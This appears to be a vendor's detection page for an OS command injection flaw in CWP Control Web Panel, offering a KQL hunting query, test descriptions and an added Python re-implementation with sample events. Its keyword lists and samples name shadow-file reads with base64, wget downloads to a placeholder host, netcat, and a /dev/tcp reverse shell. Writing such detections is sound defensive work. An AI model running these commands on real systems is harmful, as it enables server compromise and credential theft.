CVE-2025-48703

CVE-2025-48703 - CWP Control Web Panel OS Command Injection

Detects exploitation of CVE-2025-48703, an OS command injection vulnerability (CWE-78) in CWP Control Web Panel. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through the web panel interface, potentially leading to full server compromise.

Vulnerability Intelligence

KEV — Known Exploited

Affected Software

Vendor
CWP
Product
Control Web Panel

Weakness (CWE)
CWE-78 (OS Command Injection)

Timeline

Disclosed
November 4, 2025

CVSS

Unscored

What is CVE-2025-48703 (CWP Control Web Panel OS Command Injection)?

CVE-2025-48703 (CWP Control Web Panel OS Command Injection) maps to the MITRE ATT&CK tactics Execution, Persistence and Privilege Escalation: the adversary is trying to run malicious code on the CWP host and keep access to it.

This page provides production-ready detection logic for CVE-2025-48703 - CWP Control Web Panel OS Command Injection, covering the data sources and telemetry it touches: Microsoft Defender for Endpoint, Azure Security Center, Syslog. The queries below are rated critical severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.

MITRE ATT&CK

Tactic
Execution, Persistence, Privilege Escalation
Microsoft Sentinel / Defender
```kusto
let cwp_web_paths = dynamic(['/usr/local/cwpsrv/', '/opt/cwp/', 'cwp_api', 'cwp-api']);
let suspicious_cmds = dynamic(['id', 'whoami', 'uname', 'cat /etc/passwd', 'cat /etc/shadow', 'chmod', 'chown', 'curl', 'wget', '/tmp/', '/dev/shm']);
let web_parents = dynamic(['httpd', 'apache2', 'nginx', 'cwpsrv', 'php-fpm', 'php']);
let critical_terms = dynamic(['cat /etc/shadow', 'chmod 777', '/dev/shm', 'base64']);
let high_terms = dynamic(['wget', 'curl', 'nc', 'ncat']);
union DeviceProcessEvents, SecurityEvent
| where TimeGenerated > ago(24h)
// The two tables name the same fields differently: DeviceProcessEvents carries the parent in
// InitiatingProcessFileName and the host in DeviceName, SecurityEvent (4688) in ParentProcessName and Computer.
| extend ParentProcessName = coalesce(ParentProcessName, InitiatingProcessFileName)
| extend ProcessCommandLine = coalesce(ProcessCommandLine, CommandLine)
| extend DeviceName = coalesce(DeviceName, Computer)
| where (ParentProcessName has_any (web_parents) and ProcessCommandLine has_any (suspicious_cmds))
    or (ProcessCommandLine has_any (cwp_web_paths) and ProcessCommandLine has_any (suspicious_cmds))
| extend RiskScore = case(
    ProcessCommandLine has_any (critical_terms), 'Critical',
    ProcessCommandLine has_any (high_terms), 'High',
    'Medium')
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine, ParentProcessName, InitiatingProcessCommandLine, RiskScore
| order by TimeGenerated desc
```

Detects suspicious child processes spawned from CWP web server processes that are indicative of OS command injection exploitation. Focuses on web server parent processes executing shell utilities, data exfiltration tools, or file system manipulation commands.

Severity: critical. Confidence: medium.

Data Sources

Microsoft Defender for Endpoint, Azure Security Center, Syslog

Required Tables

DeviceProcessEvents, SecurityEvent, Syslog

False Positives

  • Legitimate CWP administrative scripts executed by system administrators via the panel
  • Automated maintenance tasks triggered through CWP cron or task scheduler
  • Security scanning tools running against the CWP host from an authorized scanner
  • Developer testing of CWP API endpoints in a non-production environment

Sigma rule & cross-platform mapping

The detection logic above for CVE-2025-48703 (CWP Control Web Panel OS Command Injection) is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic ships here as native queries for KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic Security (EQL), IBM QRadar (AQL), Sumo Logic CSE, Google Chronicle / SecOps (YARA-L) and CrowdStrike LogScale (CQL). In Sigma terms, this detection targets the following logsource:

logsource:
  category: process_creation
  product: linux   # CWP runs on Linux; the web server user and paths above are Linux telemetry


Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: CWP Command Injection via API Parameter

    Expected signal: Linux audit log EXECVE event showing 'id' executed by the web server user (www-data/apache/cwp); web access log entry with URL-encoded semicolon in query parameter

  2. Test 2: Reverse Shell Establishment Post-CWP Exploitation

    Expected signal: Process creation event for bash spawned by www-data user with -i flag and /dev/tcp redirect; outbound TCP connection to attacker IP on port 4444 from the CWP host

  3. Test 3: Credential Harvesting via /etc/shadow Access

    Expected signal: Audit log showing www-data user attempting to read /etc/shadow; base64 encoding command in process arguments; file access event on /etc/shadow

  4. Test 4: Dropper Download via Injected wget Command

    Expected signal: wget process spawned by www-data with external URL argument; outbound HTTP GET to attacker-controlled server; file creation event in /tmp by web service user; chmod execution on downloaded file
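The KQL query and the expected signals in Tests 1 to 4 can be exercised offline before deployment. The Python below is an added example, not code from this page or from CWP: it re-implements the query's web-parent and RiskScore logic over constructed process-creation events and adds the Test 1 access-log check (encoded semicolon in a query to a CWP API path). The `parent`/`cmdline` field names, `PLACEHOLDER_HOST`, and the extra `%7C`/`%26` metacharacters are assumptions, and the term matching only approximates KQL's has_any.

```python
import re

# Term lists copied from the page's KQL; score_event mirrors its case() tiers.
WEB_PARENTS = ["httpd", "apache2", "nginx", "cwpsrv", "php-fpm", "php"]
CWP_WEB_PATHS = ["/usr/local/cwpsrv/", "/opt/cwp/", "cwp_api", "cwp-api"]
SUSPICIOUS_CMDS = ["id", "whoami", "uname", "cat /etc/passwd", "cat /etc/shadow",
                   "chmod", "chown", "curl", "wget", "/tmp/", "/dev/shm"]
CRITICAL_TERMS = ["cat /etc/shadow", "chmod 777", "/dev/shm", "base64"]
HIGH_TERMS = ["wget", "curl", "nc", "ncat"]

def _terms(s):
    # Split on non-word characters, approximating KQL's term-based has/has_any (assumption).
    return re.findall(r"[a-z0-9_]+", s.lower())

def _has_any(text, needles):
    # True if any needle's term sequence occurs contiguously among text's terms.
    t = _terms(text)
    for n in map(_terms, needles):
        if any(t[i:i + len(n)] == n for i in range(len(t) - len(n) + 1)):
            return True
    return False

def score_event(ev):
    """RiskScore tier for one process event ({'parent': image, 'cmdline': str}), or None if not flagged."""
    if not _has_any(ev["cmdline"], SUSPICIOUS_CMDS):
        return None
    if not (_has_any(ev["parent"], WEB_PARENTS) or _has_any(ev["cmdline"], CWP_WEB_PATHS)):
        return None
    if _has_any(ev["cmdline"], CRITICAL_TERMS):
        return "Critical"
    return "High" if _has_any(ev["cmdline"], HIGH_TERMS) else "Medium"

# Test 1's access-log signal: encoded ';' (%3B) in a query to a CWP API path; %7C and %26 added here.
ENCODED_SHELL_META = re.compile(r"%(3B|7C|26)", re.IGNORECASE)

def flags_injection_request(request_line):
    # request_line is the 'METHOD target HTTP/x' field of an access-log entry.
    path, _, query = request_line.split(" ")[1].partition("?")
    if "cwp_api" not in path and "cwp-api" not in path:
        return False
    return ENCODED_SHELL_META.search(query) is not None

# Constructed sample events, not real telemetry; PLACEHOLDER_HOST stands in for any external host.
SAMPLE_EVENTS = [
    {"parent": "/usr/sbin/httpd", "cmdline": "sh -c id"},
    {"parent": "/usr/sbin/httpd", "cmdline": "bash -c 'cat /etc/shadow | base64'"},
    {"parent": "/usr/sbin/cron", "cmdline": "wget https://updates.example.invalid/a.sh -O /tmp/a.sh"},
    {"parent": "/usr/sbin/nginx", "cmdline": "wget http://PLACEHOLDER_HOST/d -O /tmp/d"},
]
```

The third sample shows the query's main false-positive class from the list above: the same wget command is not flagged when its parent is cron rather than the web server.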

Unlock Pro Content

Get the full detection package for CVE-2025-48703 including response playbook, investigation guide, and atomic red team tests.
